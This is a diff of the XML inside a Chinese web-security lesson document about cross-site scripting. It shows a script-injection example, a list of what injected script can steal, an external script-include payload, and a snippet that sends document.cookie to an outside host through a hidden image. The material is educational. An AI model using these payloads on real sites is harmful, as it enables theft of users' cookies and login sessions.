--- a/10.Web前端/02.WebInspect/WebInspect.docx
+++ b/10.Web前端/02.WebInspect/WebInspect.docx
@@ -650,355 +650,9 @@
         </w:tblBorders>
         <w:tblLayout w:type="fixed"/>
         <w:tblCellMar>
+          <w:top w:w="0" w:type="dxa"/>
           <w:left w:w="108" w:type="dxa"/>
-          <w:right w:w="108" w:type="dxa"/>
-        </w:tblCellMar>
-      </w:tblPr>
-      <w:tblGrid>
-        <w:gridCol w:w="8522"/>
-      </w:tblGrid>
-      <w:tr>
-        <w:tblPrEx>
-          <w:tblBorders>
-            <w:top w:val="single" w:color="auto" w:sz="4" w:space="0"/>
-            <w:left w:val="single" w:color="auto" w:sz="4" w:space="0"/>
-            <w:bottom w:val="single" w:color="auto" w:sz="4" w:space="0"/>
-            <w:right w:val="single" w:color="auto" w:sz="4" w:space="0"/>
-            <w:insideH w:val="single" w:color="auto" w:sz="4" w:space="0"/>
-            <w:insideV w:val="single" w:color="auto" w:sz="4" w:space="0"/>
-          </w:tblBorders>
-          <w:tblLayout w:type="fixed"/>
-        </w:tblPrEx>
-        <w:tc>
-          <w:tcPr>
-            <w:tcW w:w="8522" w:type="dxa"/>
-          </w:tcPr>
-          <w:p>
-            <w:pPr>
-              <w:jc w:val="left"/>
-              <w:rPr>
-                <w:rFonts w:hint="eastAsia"/>
-                <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
-              </w:rPr>
-            </w:pPr>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:hint="eastAsia"/>
-                <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
-              </w:rPr>
-              <w:t>&lt;div&gt;${content}&lt;/div&gt;  +  content:hello  =  &lt;div&gt;hello&lt;/div&gt;</w:t>
-            </w:r>
-          </w:p>
-          <w:p>
-            <w:pPr>
-              <w:ind w:left="240" w:leftChars="100" w:firstLine="240" w:firstLineChars="100"/>
-              <w:jc w:val="left"/>
-              <w:rPr>
-                <w:rFonts w:hint="eastAsia"/>
-                <w:vertAlign w:val="baseline"/>
-                <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
-              </w:rPr>
-            </w:pPr>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:hint="eastAsia"/>
-                <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
-              </w:rPr>
-              <w:t>&lt;div&gt;${content}&lt;/div&gt;  +  content:&lt;script&gt;alert(1)&lt;/script&gt;  = &lt;div&gt;&lt;script&gt;alert(1)&lt;/script&gt;&lt;/div&gt;</w:t>
-            </w:r>
-          </w:p>
-        </w:tc>
-      </w:tr>
-    </w:tbl>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
-        </w:rPr>
-      </w:pPr>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="4"/>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
-        </w:rPr>
-        <w:t>3.2 alert弹窗能上天？Scripting能干啥？</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:numPr>
-          <w:ilvl w:val="0"/>
-          <w:numId w:val="0"/>
-        </w:numPr>
-        <w:ind w:left="420" w:leftChars="0" w:firstLine="420" w:firstLineChars="0"/>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
-        </w:rPr>
-        <w:t>*获取页面数据</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:numPr>
-          <w:ilvl w:val="0"/>
-          <w:numId w:val="0"/>
-        </w:numPr>
-        <w:ind w:firstLine="420" w:firstLineChars="0"/>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
-        </w:rPr>
-        <w:tab/>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
-        </w:rPr>
-        <w:t>*获取Cookies</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:numPr>
-          <w:ilvl w:val="0"/>
-          <w:numId w:val="0"/>
-        </w:numPr>
-        <w:ind w:firstLine="420" w:firstLineChars="0"/>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
-        </w:rPr>
-        <w:tab/>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
-        </w:rPr>
-        <w:t>*劫持前端逻辑</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:numPr>
-          <w:ilvl w:val="0"/>
-          <w:numId w:val="0"/>
-        </w:numPr>
-        <w:ind w:firstLine="420" w:firstLineChars="0"/>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
-        </w:rPr>
-        <w:tab/>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
-        </w:rPr>
-        <w:t>*发送请求</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:numPr>
-          <w:ilvl w:val="0"/>
-          <w:numId w:val="0"/>
-        </w:numPr>
-        <w:ind w:firstLine="420" w:firstLineChars="0"/>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
-        </w:rPr>
-        <w:tab/>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
-        </w:rPr>
-        <w:t>*偷取网站任意数据</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:numPr>
-          <w:ilvl w:val="0"/>
-          <w:numId w:val="0"/>
-        </w:numPr>
-        <w:ind w:firstLine="420" w:firstLineChars="0"/>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
-        </w:rPr>
-        <w:tab/>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
-        </w:rPr>
-        <w:t>*偷取用户资料</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:numPr>
-          <w:ilvl w:val="0"/>
-          <w:numId w:val="0"/>
-        </w:numPr>
-        <w:ind w:firstLine="420" w:firstLineChars="0"/>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
-        </w:rPr>
-        <w:tab/>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
-        </w:rPr>
-        <w:t>*偷取用户密码和登录态</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:numPr>
-          <w:ilvl w:val="0"/>
-          <w:numId w:val="0"/>
-        </w:numPr>
-        <w:ind w:firstLine="420" w:firstLineChars="0"/>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
-        </w:rPr>
-        <w:tab/>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
-        </w:rPr>
-        <w:t>*欺骗用户</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:numPr>
-          <w:ilvl w:val="0"/>
-          <w:numId w:val="0"/>
-        </w:numPr>
-        <w:ind w:firstLine="420" w:firstLineChars="0"/>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
-        </w:rPr>
-        <w:t>（1）案例1：站酷搜索</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:numPr>
-          <w:ilvl w:val="0"/>
-          <w:numId w:val="0"/>
-        </w:numPr>
-        <w:ind w:firstLine="420" w:firstLineChars="0"/>
-        <w:rPr>
-          <w:rFonts w:hint="default"/>
-          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:hint="default"/>
-          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
-        </w:rPr>
-        <w:t>&lt;script src="https://saintcoder.duapp.com/joke/joke.js"&gt;&lt;/script&gt;</w:t>
-      </w:r>
-    </w:p>
-    <w:tbl>
-      <w:tblPr>
-        <w:tblStyle w:val="8"/>
-        <w:tblW w:w="8522" w:type="dxa"/>
-        <w:tblInd w:w="0" w:type="dxa"/>
-        <w:tblBorders>
-          <w:top w:val="single" w:color="auto" w:sz="4" w:space="0"/>
-          <w:left w:val="single" w:color="auto" w:sz="4" w:space="0"/>
-          <w:bottom w:val="single" w:color="auto" w:sz="4" w:space="0"/>
-          <w:right w:val="single" w:color="auto" w:sz="4" w:space="0"/>
-          <w:insideH w:val="single" w:color="auto" w:sz="4" w:space="0"/>
-          <w:insideV w:val="single" w:color="auto" w:sz="4" w:space="0"/>
-        </w:tblBorders>
-        <w:tblLayout w:type="fixed"/>
-        <w:tblCellMar>
-          <w:left w:w="108" w:type="dxa"/>
+          <w:bottom w:w="0" w:type="dxa"/>
           <w:right w:w="108" w:type="dxa"/>
         </w:tblCellMar>
       </w:tblPr>
@@ -1017,7 +671,9 @@
           </w:tblBorders>
           <w:tblLayout w:type="fixed"/>
           <w:tblCellMar>
+            <w:top w:w="0" w:type="dxa"/>
             <w:left w:w="108" w:type="dxa"/>
+            <w:bottom w:w="0" w:type="dxa"/>
             <w:right w:w="108" w:type="dxa"/>
           </w:tblCellMar>
         </w:tblPrEx>
@@ -1027,115 +683,85 @@
           </w:tcPr>
           <w:p>
             <w:pPr>
-              <w:numPr>
-                <w:ilvl w:val="0"/>
-                <w:numId w:val="0"/>
-              </w:numPr>
-              <w:rPr>
-                <w:rFonts w:hint="default"/>
-                <w:vertAlign w:val="baseline"/>
+              <w:jc w:val="left"/>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
                 <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
               </w:rPr>
             </w:pPr>
             <w:r>
               <w:rPr>
-                <w:rFonts w:hint="default"/>
-                <w:vertAlign w:val="baseline"/>
-                <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
-              </w:rPr>
-              <w:t>var img = document.creatElement('img');</w:t>
+                <w:rFonts w:hint="eastAsia"/>
+                <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t>&lt;div&gt;${content}&lt;/div&gt;  +  content:hello  =  &lt;div&gt;hello&lt;/div&gt;</w:t>
             </w:r>
           </w:p>
           <w:p>
             <w:pPr>
-              <w:numPr>
-                <w:ilvl w:val="0"/>
-                <w:numId w:val="0"/>
-              </w:numPr>
-              <w:rPr>
-                <w:rFonts w:hint="default"/>
+              <w:ind w:left="240" w:leftChars="100" w:firstLine="240" w:firstLineChars="100"/>
+              <w:jc w:val="left"/>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
                 <w:vertAlign w:val="baseline"/>
                 <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
               </w:rPr>
             </w:pPr>
             <w:r>
               <w:rPr>
-                <w:rFonts w:hint="default"/>
-                <w:vertAlign w:val="baseline"/>
-                <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
-              </w:rPr>
-              <w:tab/>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:hint="default"/>
-                <w:vertAlign w:val="baseline"/>
-                <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
-              </w:rPr>
-              <w:t>img.width = 0;</w:t>
-            </w:r>
-          </w:p>
-          <w:p>
-            <w:pPr>
-              <w:numPr>
-                <w:ilvl w:val="0"/>
-                <w:numId w:val="0"/>
-              </w:numPr>
-              <w:rPr>
-                <w:rFonts w:hint="default"/>
-                <w:vertAlign w:val="baseline"/>
-                <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
-              </w:rPr>
-            </w:pPr>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:hint="default"/>
-                <w:vertAlign w:val="baseline"/>
-                <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
-              </w:rPr>
-              <w:tab/>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:hint="default"/>
-                <w:vertAlign w:val="baseline"/>
-                <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
-              </w:rPr>
-              <w:t>img.height = 0;</w:t>
-            </w:r>
-          </w:p>
-          <w:p>
-            <w:pPr>
-              <w:numPr>
-                <w:ilvl w:val="0"/>
-                <w:numId w:val="0"/>
-              </w:numPr>
-              <w:rPr>
-                <w:rFonts w:hint="default"/>
-                <w:vertAlign w:val="baseline"/>
-                <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
-              </w:rPr>
-            </w:pPr>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:hint="default"/>
-                <w:vertAlign w:val="baseline"/>
-                <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
-              </w:rPr>
-              <w:tab/>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:hint="default"/>
-                <w:vertAlign w:val="baseline"/>
-                <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
-              </w:rPr>
-              <w:t>img.src = 'http:://saintcoder.duapp.com/joke/joke.php?joke=' + encodeURIComponent(document.cookie);</w:t>
+                <w:rFonts w:hint="eastAsia"/>
+                <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t>&lt;div&gt;${content}&lt;/div&gt;  +  content:&lt;script&gt;alert(1)&lt;/script&gt;  = &lt;div&gt;&lt;script&gt;alert(1)&lt;/script&gt;&lt;/div&gt;</w:t>
             </w:r>
           </w:p>
         </w:tc>
       </w:tr>
     </w:tbl>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="4"/>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
+        </w:rPr>
+        <w:t>3.2 alert弹窗能上天？Scripting能干啥？</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="0"/>
+        </w:numPr>
+        <w:ind w:left="420" w:leftChars="0" w:firstLine="420" w:firstLineChars="0"/>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
+        </w:rPr>
+        <w:t>*获取页面数据</w:t>
+      </w:r>
+    </w:p>
     <w:p>
       <w:pPr>
         <w:numPr>
@@ -1153,7 +779,216 @@
           <w:rFonts w:hint="eastAsia"/>
           <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
         </w:rPr>
-        <w:t>（2）案例2：QQ空间</w:t>
+        <w:tab/>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
+        </w:rPr>
+        <w:t>*获取Cookies</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="0"/>
+        </w:numPr>
+        <w:ind w:firstLine="420" w:firstLineChars="0"/>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
+        </w:rPr>
+        <w:tab/>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
+        </w:rPr>
+        <w:t>*劫持前端逻辑</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="0"/>
+        </w:numPr>
+        <w:ind w:firstLine="420" w:firstLineChars="0"/>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
+        </w:rPr>
+        <w:tab/>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
+        </w:rPr>
+        <w:t>*发送请求</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="0"/>
+        </w:numPr>
+        <w:ind w:firstLine="420" w:firstLineChars="0"/>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
+        </w:rPr>
+        <w:tab/>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
+        </w:rPr>
+        <w:t>*偷取网站任意数据</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="0"/>
+        </w:numPr>
+        <w:ind w:firstLine="420" w:firstLineChars="0"/>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
+        </w:rPr>
+        <w:tab/>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
+        </w:rPr>
+        <w:t>*偷取用户资料</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="0"/>
+        </w:numPr>
+        <w:ind w:firstLine="420" w:firstLineChars="0"/>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
+        </w:rPr>
+        <w:tab/>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
+        </w:rPr>
+        <w:t>*偷取用户密码和登录态</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="0"/>
+        </w:numPr>
+        <w:ind w:firstLine="420" w:firstLineChars="0"/>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
+        </w:rPr>
+        <w:tab/>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
+        </w:rPr>
+        <w:t>*欺骗用户</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="0"/>
+        </w:numPr>
+        <w:ind w:firstLine="420" w:firstLineChars="0"/>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
+        </w:rPr>
+        <w:t>（1）案例1：站酷搜索</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="0"/>
+        </w:numPr>
+        <w:ind w:firstLine="420" w:firstLineChars="0"/>
+        <w:rPr>
+          <w:rFonts w:hint="default"/>
+          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="default"/>
+          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
+        </w:rPr>
+        <w:t>&lt;script src="https://saintcoder.duapp.com/joke/joke.js"&gt;&lt;/script&gt;</w:t>
       </w:r>
     </w:p>
     <w:tbl>
@@ -1171,7 +1006,9 @@
         </w:tblBorders>
         <w:tblLayout w:type="fixed"/>
         <w:tblCellMar>
+          <w:top w:w="0" w:type="dxa"/>
           <w:left w:w="108" w:type="dxa"/>
+          <w:bottom w:w="0" w:type="dxa"/>
           <w:right w:w="108" w:type="dxa"/>
         </w:tblCellMar>
       </w:tblPr>
@@ -1190,7 +1027,186 @@
           </w:tblBorders>
           <w:tblLayout w:type="fixed"/>
           <w:tblCellMar>
+            <w:top w:w="0" w:type="dxa"/>
             <w:left w:w="108" w:type="dxa"/>
+            <w:bottom w:w="0" w:type="dxa"/>
+            <w:right w:w="108" w:type="dxa"/>
+          </w:tblCellMar>
+        </w:tblPrEx>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="8522" w:type="dxa"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:numPr>
+                <w:ilvl w:val="0"/>
+                <w:numId w:val="0"/>
+              </w:numPr>
+              <w:rPr>
+                <w:rFonts w:hint="default"/>
+                <w:vertAlign w:val="baseline"/>
+                <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="default"/>
+                <w:vertAlign w:val="baseline"/>
+                <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t>var img = document.creatElement('img');</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:numPr>
+                <w:ilvl w:val="0"/>
+                <w:numId w:val="0"/>
+              </w:numPr>
+              <w:rPr>
+                <w:rFonts w:hint="default"/>
+                <w:vertAlign w:val="baseline"/>
+                <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="default"/>
+                <w:vertAlign w:val="baseline"/>
+                <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:tab/>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="default"/>
+                <w:vertAlign w:val="baseline"/>
+                <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t>img.width = 0;</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:numPr>
+                <w:ilvl w:val="0"/>
+                <w:numId w:val="0"/>
+              </w:numPr>
+              <w:rPr>
+                <w:rFonts w:hint="default"/>
+                <w:vertAlign w:val="baseline"/>
+                <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="default"/>
+                <w:vertAlign w:val="baseline"/>
+                <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:tab/>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="default"/>
+                <w:vertAlign w:val="baseline"/>
+                <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t>img.height = 0;</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:numPr>
+                <w:ilvl w:val="0"/>
+                <w:numId w:val="0"/>
+              </w:numPr>
+              <w:rPr>
+                <w:rFonts w:hint="default"/>
+                <w:vertAlign w:val="baseline"/>
+                <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="default"/>
+                <w:vertAlign w:val="baseline"/>
+                <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:tab/>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="default"/>
+                <w:vertAlign w:val="baseline"/>
+                <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t>img.src = 'http:://saintcoder.duapp.com/joke/joke.php?joke=' + encodeURIComponent(document.cookie);</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+      </w:tr>
+    </w:tbl>
+    <w:p>
+      <w:pPr>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="0"/>
+        </w:numPr>
+        <w:ind w:firstLine="420" w:firstLineChars="0"/>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
+        </w:rPr>
+        <w:t>（2）案例2：QQ空间</w:t>
+      </w:r>
+    </w:p>
+    <w:tbl>
+      <w:tblPr>
+        <w:tblStyle w:val="8"/>
+        <w:tblW w:w="8522" w:type="dxa"/>
+        <w:tblInd w:w="0" w:type="dxa"/>
+        <w:tblBorders>
+          <w:top w:val="single" w:color="auto" w:sz="4" w:space="0"/>
+          <w:left w:val="single" w:color="auto" w:sz="4" w:space="0"/>
+          <w:bottom w:val="single" w:color="auto" w:sz="4" w:space="0"/>
+          <w:right w:val="single" w:color="auto" w:sz="4" w:space="0"/>
+          <w:insideH w:val="single" w:color="auto" w:sz="4" w:space="0"/>
